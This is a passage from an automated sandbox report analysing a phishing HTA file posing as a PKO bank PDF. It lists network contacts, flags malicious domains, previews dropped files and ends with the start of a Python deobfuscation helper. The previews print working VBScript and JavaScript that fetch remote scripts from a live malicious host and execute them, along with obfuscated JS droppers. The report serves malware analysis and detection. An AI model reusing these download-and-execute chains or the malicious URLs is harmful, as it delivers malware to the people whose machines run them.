                                                                              https://drive.google.com/?tab=wopowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs.vmshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://contoso.com/Iconpowershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsggmshta.exe, 00000000.00000002.1842826002.00000000060B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://0.googlepowershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsdownload.kagyouth.co.ke/676198543mshta.exe, 00000000.00000002.1842802315.00000000060A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://pko-download.kagyouth.co.ke/js/pmxdhq.txtdwscript.exe, 0000000A.00000002.1914474150.0000000002DA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911863015.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911774958.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://mail.google.com/mail/?tab=wmpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.google.com/preferences?hl=enpowershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.youtube.com/?tab=w1powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://0.google.powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://pko-download.kagyouth.co.ke/$mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsimshta.exe, 00000000.00000002.1842849425.00000000060BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1826274179.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840527491.00000000060BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://0.google.com/powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.google.com/history/optout?hl=enpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://books.google.com/?hl=en&tab=wppowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://translate.google.com/?hl=en&tab=wTpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
IP             | Domain                      | Country       | ASN   | ASN Name  | Malicious
172.217.19.228 | www.google.com              | United States | 15169 | GOOGLEUS  | false
193.149.129.61 | gsosnub8zg3.top             | Denmark       | 15411 | DANISCODK | true
45.11.180.77   | pko-download.kagyouth.co.ke | Germany       | 9009  | M247GB    | true

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576834
Start date and time: 2024-12-17 16:29:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta (renamed because the original name is a hash value)
Original Sample Name: PKO_0019868519477_PDF_.hta
Detection: MAL
Classification: mal100.troj.expl.evad.winHTA@28/15@4/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 16
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .hta
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.175.87.197, 13.107.246.63, 20.12.23.50
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 7356 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 2800 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3448 because it is empty
• Execution Graph export aborted for target wscript.exe, PID 7808 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta
Time     | Type            | Description
10:30:18 | API Interceptor | 89x Sleep call for process: powershell.exe modified
Process: C:\Windows\SysWOW64\curl.exe
File Type: ASCII text
Category: modified
Size (bytes): 1928
Entropy (8bit): 4.449895555983109
Encrypted: false
SSDEEP: 48:q58OOD+y8Qyl+hLMpvELdQu8EwNcr1Vmzd/In/IIv:q5FOD+y8QXhLM9KQuJwNcr1VmztInwIv
MD5: B25F8E57F50608E9644802482DAD72B1
SHA1: 9CAE940FDD733ACFD32FF271C461A13D0B8878FF
SHA-256: 557D6FC2139CA5AD6E0CF5DE5F61659C3247C62D68BE39C653C7E420F13DDD96
SHA-512: D1AFDB4D41995870FAE576B781472A41160DBF18CB51E0DEC607CA3D0DEDC86FACA327DFDA8D4ED675548E324640FC7722C458293DEA02A6303A1D96DCBAC19D
Malicious: true
                                                                                                                            Preview:Option Explicit..Sub DownloadAndExecuteJS(baseUrl, listEndpoint, jsFolder). Dim xmlhttp, fso, shell, jsFiles, selectedFile, tempFolder, jsFilePath. Set xmlhttp = CreateObject("MSXML2.XMLHTTP"). Set fso = CreateObject("Scripting.FileSystemObject"). Set shell = CreateObject("WScript.Shell").. On Error Resume Next. xmlhttp.Open "GET", baseUrl & listEndpoint, False. xmlhttp.Send.. If Err.Number <> 0 Then. Err.Clear. Exit Sub. End If.. If xmlhttp.Status = 200 Then. jsFiles = Split(Trim(xmlhttp.responseText), vbLf).. If UBound(jsFiles) >= 0 Then.. Randomize. selectedFile = Trim(jsFiles(Int((UBound(jsFiles) + 1) * Rnd))) .. If selectedFile <> "" Then.. tempFolder = shell.ExpandEnvironmentStrings("%TEMP%").. If Not fso.FolderExists(tempFolder) Then. fso.CreateFolder(tempFolder). End If.. jsFilePath = tempFolder & "\" & Replace
                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):358
                                                                                                                            Entropy (8bit):5.440496850538879
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:jqSHqAUcNi8mgO9lVhnB48w3w3ciRuf2fFxuZXR8wdExqdALbDRWARr9en:WULuHnB4SN8HxR6x9DRWARr9en
                                                                                                                            MD5:DCC4F17F51D0DD03131971C8C6999F2A
                                                                                                                            SHA1:DEF7702FB081DB18A0675AA58BCC1DE0B282DDDE
                                                                                                                            SHA-256:4763705BAFB7CD21FD04C22E084F9426B887AF5084F5F4E8B08579B55583587F
                                                                                                                            SHA-512:F5C13A5FFA519D27E0C13302EB248AE338C76278DDCDD7F037B4915BC71B93B54EC750ED1AE293B50CEE4931B8685166E730F80F106B5F74557ECC1714ADC937
                                                                                                                            Malicious:false
                                                                                                                            Preview:moveTo(98559, 91359);.var dqWD0kG9 = document.createElement("script");.var RNGvD95 = ".";.dqWD0kG9.setAttribute("src", "https://pko-download" + RNGvD95 + "kagyouth" + RNGvD95 + "co" + RNGvD95 + "ke/676198543e20a/676198543e2f1" + RNGvD95 + "vbs");.dqWD0kG9.setAttribute("type", "text/vbscript");.document.getElementsByTagName('head')[0].appendChild(dqWD0kG9);
                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5511
                                                                                                                            Entropy (8bit):4.266147627591556
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:7ysyAYXEdjm3uKRiTtfKbv3ZEptfBi3SwSGm+p9urbaF/Vxi71y0qPxfOUe7VP8A:7ysFYXE1m3KxfIxLV9uHaBVxeXifw98A
                                                                                                                            MD5:0FD04EAFDBE2B9D4D0BA479ED8337804
                                                                                                                            SHA1:8B8AF00F29C7AF0EC92F2843462873D1001F2FD2
                                                                                                                            SHA-256:309200C4579E7D7945DB1AAA08C65C802A7DE84C0B43B8117DB75D4AAA622930
                                                                                                                            SHA-512:2D54AB6FE2F71E03B360D2C0E5EF6269DA4EE8191445E9ACECEE4A1C935EAB8FDF1FC2C06A14B36DAA82E7BE0968F8EED1BF7FB30304BA8137C738F080E63691
                                                                                                                            Malicious:false
                                                                                                                            Preview:acosvb.txt.acvixr.txt.adimqh.txt.advkwe.txt.aehois.txt.agnprl.txt.ahtkco.txt.ajmdxh.txt.ajykuv.txt.alzcqd.txt.aolwzh.txt.aowqks.txt.apinhw.txt.apybvd.txt.aucjpi.txt.aviloh.txt.avjbmt.txt.awrgeb.txt.axgkvf.txt.axtfwk.txt.axyohf.txt.ayojtr.txt.bckimf.txt.bedskm.txt.bfmstk.txt.bgkluf.txt.bhrsok.txt.bjenhx.txt.bkuhcj.txt.bmkvfo.txt.bmntfc.txt.bnfpjq.txt.bnsqhl.txt.boctsi.txt.bqagtw.txt.brivej.txt.brmcuo.txt.brvcon.txt.bsuxni.txt.bsyhel.txt.buersl.txt.bvayux.txt.bvtnxg.txt.bwjsde.txt.bwqztc.txt.bynwiz.txt.cdfoxq.txt.cdsrne.txt.cenzsh.txt.cfvedw.txt.cgemlk.txt.chzwis.txt.cihlkf.txt.cjdams.txt.ckjhao.txt.cmhniy.txt.cmkovg.txt.cnowez.txt.codneq.txt.ctyhds.txt.cuzyrn.txt.cvbrkt.txt.cwalbf.txt.cwmist.txt.cwrqlj.txt.cwuspz.txt.cyuwxm.txt.czoahi.txt.dcswua.txt.dfzirc.txt.dimxvb.txt.djcuar.txt.djugez.txt.dkauol.txt.dlerac.txt.dnujfr.txt.dnyaje.txt.dpygbo.txt.dqetif.txt.drawbz.txt.dxvzfu.txt.dyvnzc.txt.dzlgtx.txt.eajylz.txt.eakigy.txt.eaojfc.txt.ebqkmv.txt.efznhl.txt.einfto.txt.ejorqk.txt.ejycbr.txt
                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (1724)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):232885
                                                                                                                            Entropy (8bit):4.78664216586426
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:nwL1uQGm3ik+xTSM82VZYNSLb9huQGm3ik+xTSM8AVZYNSLb9lVZYNSLb9tuQGmd:nwQpTQpzPQlQB
                                                                                                                            MD5:8C79C6796D2BA8BA322E786F3AD16D83
                                                                                                                            SHA1:F5823F83EB0BF37537ABD29A8C992D22BF0B6F2C
                                                                                                                            SHA-256:644302C0D8A3410430D2953A0C800378FE42540883FD6E41F98F5AD8370FC80A
                                                                                                                            SHA-512:2F3A58FE85A5A6BE756F2BA03BFA5ACDE820EE08634A7F19FDA178CE93801274E30ED45CC8F1DFD28CF349C1457AA24B506A6CB3D5BB7470CC75C19894C1F29C
                                                                                                                            Malicious:false
                                                                                                                            Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (1850)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):247500
                                                                                                                            Entropy (8bit):4.771099595783964
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:nUxcPd/ESk7zDZ9xcWd/ESk7zDZKd/ESk7zDZpbxcSxcd:D1W7zOiW7zIW7zfKBd
                                                                                                                            MD5:6CF9303C43CA796B3D7C7E018D3067A9
                                                                                                                            SHA1:8BB9AD339FF666981D423664123EFA361A398D17
                                                                                                                            SHA-256:5D2E9A6FBE99CB9E90C513561AC6351D5C7E59582456318FAE3A38ED1CF91E5F
                                                                                                                            SHA-512:E1A3662A087E802A5528AFADFD8291DE12481026D1BD8F8D0D125D9857753B7596BF1797668B88EF9E4C36678F82B719A2747E7148CB175E512672062D45C4E4
                                                                                                                            Malicious:false
                                                                                                                            Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):709
                                                                                                                            Entropy (8bit):5.45619524033301
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:ab1ydJWCH4AddYN1dPw0rZfHFXZ3ssFU8ZfzjqH6:ab1ydzH4witw0rFHDFFT
                                                                                                                            MD5:BB3BB1EF9ADF8446185D4DF8B13F869F
                                                                                                                            SHA1:44DCB274A64FAAEAB2F65BE68B5A122EA8B56F77
                                                                                                                            SHA-256:49563E3F972D6A04230C3AAE0E5CB943A3938E318B326F3E06A121A5B617BAC4
                                                                                                                            SHA-512:EBBAC6179B1DA3499D8E7EF6A81B611C37338D42578B3B62A620FE02D0C6EAF17679D501A816C61D8F701F27556A98DF211C74626697519BF7D21E04E22D87AB
                                                                                                                            Malicious:true
                                                                                                                            Preview:..function pVvId92(vHkR3pm51) . pVvId92 = Replace(vHkR3pm51,"|", "").end function..Dim shell, publicFolder.Set shell = CreateObject("WScript.Shell").publicFolder = shell.ExpandEnvironmentStrings("%PUBLIC%")...Dim vbsFilePath.vbsFilePath = publicFolder & "\" & "676198543e2f3.vbs"...CreateObject(pVvId92("|W|s|c|r|I|p|t.|s|h|E|l|l|")).Run pVvId92("cmd /V/D/c curl -k -o " & vbsFilePath & " https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs"), 2, TRUE...CreateObject(pVvId92("||W|s|c|r|I|p|t.|s|h|E|l|l|")).Run pVvId92("cmd /V/D/c start " & vbsFilePath), 2, TRUE..CreateObject(pVvId92("||W|s|c|r|I|p|t|.|s|h|E|l|l")).Run pVvId92("cmd /V/D/c start " & vbsFilePath), 2, TRUE.close.close.close
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):64
                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:NlllulBkXj:NllUS
                                                                                                                            MD5:453075887941F85A80949CDBA8D49A8B
                                                                                                                            SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                                                                            SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                                                                            SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e................................................@..........
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            File Type:ISO-8859 text, with very long lines (1724)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):232850
                                                                                                                            Entropy (8bit):4.785235864866798
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:nwL1ugGm3HT+xTSZ82VZYLkLb9kugGm3HT+xTSZ8AVZYLkLb9iVZYLkLb9qugGm3:no6AC6mq46K6A
                                                                                                                            MD5:34F62C31512FA8C10BC9AA9AE31564B5
                                                                                                                            SHA1:850FC059A49D1F8DBDDE87746509DA4EC6E18B68
                                                                                                                            SHA-256:E8471484582EDAC57AC7C8F6879B90A591CAC271B77E7C0F84218CA20D589F89
                                                                                                                            SHA-512:BA29527897566B25FCB1BD1804BCA25BFE0E28447AAC4FD61FBF7D2660591C1AE33D19DC76BB71689ABDA972FA3DCC10173D79D9A8CB2285F1363A5971859423
                                                                                                                            Malicious:false
                                                                                                                            Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            File Type:ISO-8859 text, with very long lines (1850)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):247474
                                                                                                                            Entropy (8bit):4.7700607316099655
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:n1xvXd/Etk7zDZKxvyd/Etk7zDZFd/Etk7zDZpQxvYxv6:XNz7zKez7zxz7zf2e6
                                                                                                                            MD5:854913C5255634F504DAEB57645DC0AB
                                                                                                                            SHA1:66A9073BEA82E6728CA8AB20B1197717A8F29098
                                                                                                                            SHA-256:243B523C7B864218A381F8BC1DBD0C9DF6F9C093E0A66977ECAC5046ADBF7FDE
                                                                                                                            SHA-512:BCD2D19FDCE680281A51133F9536AD96A687021C1B8AB5BA6122039F77CD7F64DCC6C61A842A02F00650068464B7EAF3FF98E88C8157B088F398C3CF6E2E55F3
                                                                                                                            Malicious:true
                                                                                                                            Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
                                                                                                                            Process:C:\Windows\SysWOW64\curl.exe
                                                                                                                            File Type:ASCII text, with CR, LF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):478
                                                                                                                            Entropy (8bit):3.147272201788366
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdivIdaI8gFAw:Vz6ykymUexb1U9cdd/8Yz
                                                                                                                            MD5:D8DFA07944C35960CD48BC58B49CA379
                                                                                                                            SHA1:94D9271AAD528E5AE040BE77731970A2A8BDD570
                                                                                                                            SHA-256:FC871CFF6AE5DBC541B00307791ECB41316C803B06D535BDE51D027C63C5E2D9
                                                                                                                            SHA-512:953A13D28C3741D1AEAACBA19E70284DD9DBFE2F303C8C460BB464C912FDE8CAA8FAF7A9868831D22E94737E4545E3073BF863F5A19430E807CDE64E7CC79804
                                                                                                                            Malicious:false
                                                                                                                            Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 1928 100 1928 0 0 869 0 0:00:02 0:00:02 --:--:-- 870.100 1928 100 1928 0 0 824 0 0:00:02 0:00:02 --:--:-- 825..
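The two dropped .js files previewed above have the shape of obfuscator.io / javascript-obfuscator output: a string-array accessor whose index is rebased by a subtracted constant, an `=== undefined` guard, an inline base64 alphabet, and every integer spelled as a sum of hex literals (`0x517 * 0x1 + 0x16be + 0x1a8a * -0x1`). Folding that arithmetic is the first step of reading such a script. The Python helper below is an added example, not code from the report or from the sample; it evaluates runs of integer-literal arithmetic (`+`, `-`, `*` only, with JavaScript's precedence, and it refuses to fold a run that would change meaning because a tighter or left-associative operator sits next to it) and is run over the preview text as printed in the report, where Joe Sandbox renders each line break as ".". The report's preview is cut off mid-expression, so the embedded sample stops at the last complete statement.

```python
import ast
import operator
import re

# Preview of the dropped .js file as printed in the report, with the "." line-break
# placeholders restored to newlines. The report truncates the preview mid-expression,
# so this sample ends at the last complete statement.
PREVIEW = """var thehis0wouldsovereignty = thehis0thewith;
function thehis0thewith(nothistory, thewith) {
 var wouldsovereignty = thehis0nothistory();
 thehis0thewith = function (andrewforces, suchthe) {
 andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);
 var ourtypos = wouldsovereignty[andrewforces];
 if (thehis0thewith['FzvcMl'] === undefined) {
 var courtvii = function (Ourtypos) {
 var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
 var Suchthe = '';
 var Wouldsovereignty = '';
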